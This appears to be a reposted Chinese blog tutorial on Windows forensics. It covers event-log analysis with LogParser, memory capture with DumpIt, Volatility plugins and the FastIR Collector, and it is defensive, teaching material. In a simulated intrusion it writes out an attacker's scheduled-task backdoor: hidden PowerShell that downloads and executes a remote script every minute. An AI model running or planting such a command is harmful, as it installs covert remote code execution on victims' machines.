Windows取证一
Windows取证
基础
取证通常作为一个公司的事件响应调查人员或者司法调查的取证人员,通过调查被入侵的机器,将被入侵者的行为轨迹梳理出来,还原整个入侵的过程。对于入侵者而言,了解电子取证,可以更全面的了解到自己能够在系统中留下的痕迹,从而具有针对性的消除痕迹,而对于取证人员来说,电子取证无疑是了解整个入侵过程的关键。电子取证近年来也发展为了一个独立的学科,其中在安全竞赛中,电子取证也作为一部分考察内容,被纳入到杂项的大类中,也有只考察取证的竞赛。下面从技术层面介绍Windows取证的相关知识。
审查日志
windows操作系统事件日志
C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32)
- 应用程序日志 App Event.Evtx(Application.evtx)
- 安全日志 SecEvent.Evtx
- 系统日志 SysEvent.Evtx
事件查看器
日志分析工具
微软官方的日志分析:https://www.cnblogs.com/haoliansheng/p/4040208.html
Logparser.exe –i:EVT –o:DATAGRID "SELECT * FROM c:\11.evtx"
LogParser.exe -i:EVT "SELECT TimeGenerated,EventID,EXTRACT_TOKEN(Strings,1,'|') as UserName,EXTRACT_TOKEN(Strings,5,'|') as ProcessName FROM c:\11.evtx where EventID=4688"
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-F89oqjP6-1648259564999)(
]
3、管理账号登录
在创建管理账户后,尝试远程登录到目标主机,获取敏感信息。
mstsc /v 10.1.1.188
Windows日志分析:
在本地安全策略中,需开启审核登录事件,关键登录事件和说明,如:
4624 登录成功
4625 登录失败
LogParser.exe -i:EVT "SELECT TimeGenerated as LoginTime,EXTRACT_TOKEN(Strings,8,'|') as EventType,EXTRACT_TOKEN(Strings,5,'|') as username,EXTRACT_TOKEN(Strings,18,'|') as Loginip FROM C:\3333.evtx where EventID=4624"
使用LogParser做一下分析,得到系统登录时间,登录类型10 也就是远程登录,登录用户 test,登录IP:10.1.1.1。
4、权限维持
通过创建计划任务执行脚本后门,以便下次直接进入,使用以下命令可以一键实现:
schtasks /create /sc minute /mo 1 /tn "Security Script" /tr "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring(\"\"\"http://10.1.1.1:8888/logo.txt\"\"\"))\""
Windows日志分析:
在本地安全策略中,需开启审核对象访问,关键对象访问事件,如:
4698 创建计划任务
4699 删除计划任务
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8fdMx4n7-1648259565003)( https://www.cnblogs.com/xiaozi/p/image/20201211-06.png)]
这里涉及进程创建和对象访问事件,包括schtasks.exe进程的创建和Event ID 4698发现新建的计划任务。成功找到计划任务后门位置:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9IDsH9ho-1648259565004)(https://www.cnblogs.com/xiaozi/p/image/20201211-07.png)]
活取证
- 抓取文件的metadata、创建是时间线、命令历史、分析日志文件、哈希摘要、转存内存信息
- 使用未受感染的干净程序进行取证
- U盘、网络、存储设备收集到的数据
死取证
- 系统关机后制作硬盘镜像、分析镜像
在活取证中,可以使用内存dump工具,将被入侵的机器的内存保存下来,常用的内存镜像取证工具是Dumplt、FTK Imager、Belkasoft RAM Capture和Dump镜像内存提取工具。其中在Windows中经常使用的工具是Dumpit
DumpIt 是一款绿色免安装的 windows 内存镜像取证工具。利用它我们可以轻松地将一个系统的完整内存镜像下来,并用于后续的调查取证工作
下载地址 https://down10.software/download-dumpit/
在dump内存后,获取到的文件大小约等于主机内存的大小,所以在自己进行测试的时候,可以尽量把测试机的内存调小一点。
这里使用上面说的Dumpit工具,下载之后放到虚拟机中,双击之后输入y即可获取当前的状态的内存文件,保存后是一个raw格式的文件,这里我在测试机上dump了一下内存,获取到了一个文件,用于下面的示例讲解,大家可以根据下面的讲解自己创建镜像进行测试。
在取证工具中,比较有名的是Volatility,他是一个用于事件响应和恶意软件分析的开源内存取证框架。它是用Python编写的,支持Microsoft Windows,macOS和Linux,volatility框架是一个完全开放的工具集合,在GNU通用许可证下用Python实现,用于从易失性存储器(RAM)样本总提取数字镜像。提取技术完全独立于被取证的系统而执行,但可以查看到系统运行时的状态信息。该框架旨在向人们介绍从内存样本中提取的数字镜像相关的技术,并为进一步研究该领域提供一个平台,它可以分析 .raw、.vmem、.img后缀的文件
下载地址:https://github.com/volatilityfoundation/volatility
我自己安装的时候碰到了这个问题,
*** Failed to import volatility.plugins.registry.shutdown (ImportError: No module named Crypto.Hash)
*** Failed to import volatility.plugins.getservicesids (ImportError: No module named Crypto.Hash)
在issue里找到解决方案
https://github.com/volatilityfoundation/volatility/issues/771
先查看内存镜像文件版本信息
python vol.py -f /tmp/test/DESKTOP-5DRPRQ1-20220321-030822.raw imageinfo
python vol.py -f TEST-PC.raw --profile=Win10x64_19041 pslist
python vol.py -f TEST-PC.raw --profile=Win10x64_19041 notepad
netscan 查看网络连接情况
python vol.py -f /root/lltest/PC-20170527XAOD-20180409-232828.raw --profile=Win7SP1x86 netscan
显示该这个插件不支持这个系统,这时可以使用 editbox 查看
python vol.py -f TEST-PC.raw --profile=Win7SP1x64 editbox
malfind 查找隐藏或注入的代码/ DLL
python vol.py -f /root/lltest/PC-20170527XAOD-20180409-232828.raw --profile=Win7SP1x86 malfind
可看到进程pid为620的svchost.exe存在异常:
更详细的用法可以到 https://www.freebuf.com/articles/web/279976.html 这里看。
FastIR Collector Windows取证/信息收集神器
项目地址:
https://github.com/SekoiaLab/Fastir_Collector
项目简介:
FastIR Collector是一款不折不扣的神器,要说唯一的缺点也许就是体积太大了,不过因为其实python编写的,所以导致了体积的过大,但是却又因为他是python写的所以对其进行二次开发和修改的门槛会比用C开发的相对较低。
FastIR Collector是一个Windows下的信息收集工具,收集的东西揽括了所有你能想到的东西,不限于内存,注册表,文件信息等,等看完下面的列表你就能意识到为何称它为神器,说他是神器的原因还有一个,就在他名字上“fast”,他的速度也是非常快的,对一个FileCatcher进行捕获也只需要1-2分钟时间!
使用方法:
/fastIR_x64.py -h for help./fastIR_x64.py --packages all 包含所有模块./fastIR_x64.py --packages (dump|fs|registry|memory|FileCatcher) 这里可以自定义选择模块,模块就是之前列表中介绍的,大家可以对应起来按照自己的需要进行dump./fastIR_x64.py --packages all --output_dir 输入的文件夹
这里有一个chrome的访问记录文件
这里就能看到历史的访问记录了,你懂的。
Windows取证一相关推荐
- Windows 取证之ShellBags
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里 的热点话题 漏洞.技术相关的调查或分析 稿件通过并发布还能收获 200-800元不等 ...
- 电子数据取证Windows取证读书笔记
电子数据取证第六章Windows取证读书笔记 其实Windows的取证可以依靠像美亚的取证大师这类取证软件来进行. 这类软件可以完成大多数的取证需要 用户目录: WindowsXP----Docume ...
- 《Windows取证分析》
工具网站 : http://www.ntsecurity.nu/toolbox/ 命令行历史 :命令行模式 CMD 中使 doskey /history 命令可以显示前面输入的命令情况(例如使用 cl ...
- Windows 取证之注册表
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里 的热点话题 漏洞.技术相关的调查或分析 稿件通过并发布还能收获 200-800元不等 ...
- Windows取证实验
目录 一.实验目的 二.实验原理 三.实验环境 四.实验过程 1.在虚拟机下载恶意软件或脚本模拟攻击行为 2.利用Dumpit工具导出系统内存镜像. 3.利用procdump工具导出进程内存镜像. 4 ...
- Windows取证——CHNTPW工具使用(可更改 Windows 密码)
一.概述 chntpw是一个Kali Linux工具,可用于编辑Windows注册表,重置用户密码,将用户提升为管理员,以及其他几个有用的选项.使当您不知道Windows密码是什么时,可以利用chnt ...
- Windows 取证之$MFT
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里 的热点话题 漏洞.技术相关的调查或分析 稿件通过并发布还能收获 200-800元不等 ...
- 【Windows取证】隐藏用户
前言: 实验环境:Windows server 2019 实验目的:了解Windows隐藏账户的工作原理,有针对性地对隐藏账户进行应急处置. 目录 前言: 一.隐藏用户的建立 二.查看隐藏用户 法一: ...
- 【Windows取证】CHNTPW工具使用
目录 一.概述 二.实战(具体用法) (一)列出所有用户 (二)修改用户/用户组等操作 一.概述 chntpw是一个Kali Linux工具,可用于编辑Windows注册表,重置用户密码,将用户提升为 ...
- Windows取证——注册表操作命令
Get-PSProvider 获取安装的提供程序列表 Dir, Get-ChildItem 列出键的内容 Cd, Set-Location 更改当前(键)目录 HKC ...
最新文章
- fineUI表格控件各属性说明
- 笔试题——JavaScript事件循环机制(event loop、macrotask、microtask)
- 【C++】关于随机函数与概率设置
- BugKuCTF 加密 easy_crypto
- 取消IE不允许下载文件的提示
- 为or、in平反——or、in到底能不能利用索引?
- ds1302模块 树莓派_树莓派用4g模块实现三网通开机自启动
- python+selenium方法大全
- android实机闪退,安卓模拟器,安卓真机,进入播放界面就会闪退
- 大数据分析的价值有哪些
- 监控易:智慧高校一体化综合运维解决方案
- less中使用global的两种用法
- flask 数据库迁移migration
- 2-11 CAD基础 镜像(mirror)
- php的表达爱意的一句代码,一句表达爱意的古词 最能表达爱的一句话
- flutter需要定义product flavors
- 用matlab解方程组例子,Matlab求解超定方程组实例
- Windows 安全中心空白无选项解决办法
- [转]Java求实际利率之Excel函数RATE
- 太极螺旋曲线与正、反物质